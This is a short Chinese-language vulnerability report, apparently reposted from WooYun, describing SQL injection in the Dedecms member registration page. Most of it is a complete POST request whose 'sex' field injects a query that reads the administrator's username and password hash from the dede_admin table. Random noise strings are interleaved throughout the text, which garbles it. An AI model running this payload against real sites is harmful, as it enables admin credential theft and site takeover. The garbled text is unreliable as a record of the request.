漏洞类型: SQL注射漏洞9 P# I: j' s2 s) Y% C+ y
简要描述:6 v+ N) g M. q
- P7 I4 G6 g+ `' R- V; y需要magic_quotes_gpc=Off,应该是没有什么大危害的漏洞.5 u7 x- |1 T/ J% x& x
原来在wooyun发过一个Dedecms注射漏洞,貌似并没有修补,重新利用了一下,可以获得管理员密码.
- \$ D9 G- K+ o! s; g( B) R详细说明:跟这个漏洞7 {3 X) @2 }+ O5 }8 N9 F. u3 M2 R
% k5 p4 W. E1 P2 x( [ ]7 E; UWooYun: Dedecms SQL注射导致审核机制绕过漏洞' r6 p! I, F* _; J- E7 P
是一个漏洞.其实不仅仅是审核机制绕过,可以获得管理员密码的.( \6 F6 D" U! m& N4 k0 t1 V
POST提交以下数据,其实不用POST提交的,这样隐蔽点.
: [1 P7 a8 L5 N8 C. ] / o: G! X, g7 _6 e
www.political-security.com/member/reg_new.php
6 g) f! m, a' V6 l ; @& l0 m: I; l/ g l0 {5 @
POST
; [- o5 k. l3 t
6 j* g5 |' [' N9 q; T, J, ^1 vdopost=regbase&step=1&mtype=%E4%B8%AA%E4%BA%BA&mtype=%E4%B8%AA%E4%BA%BA&2 b* q; c' i, |0 K: D
userid=c4rp3nt3r&uname=c4rp3nt3r Q- ?/ D; G8 [6 f: H
&userpwd=ssssss&userpwdok=ssssss&email=sss%40ss.ss
1 k9 ^' i' ~ C&safequestion=0&safeanswer=&sex=boy',100,100,'sss@xx.xx',1000,0,'www' and @`'`, `) O1 R2 N3 [, F) E& i
(select concat(userid,0x3a,pwd) from `dede_admin` limit 1),0,'',1316751900,'',1316751900,'');) V+ t# {( d" P# y7 N$ C
%00&vdcode=glos&agree= |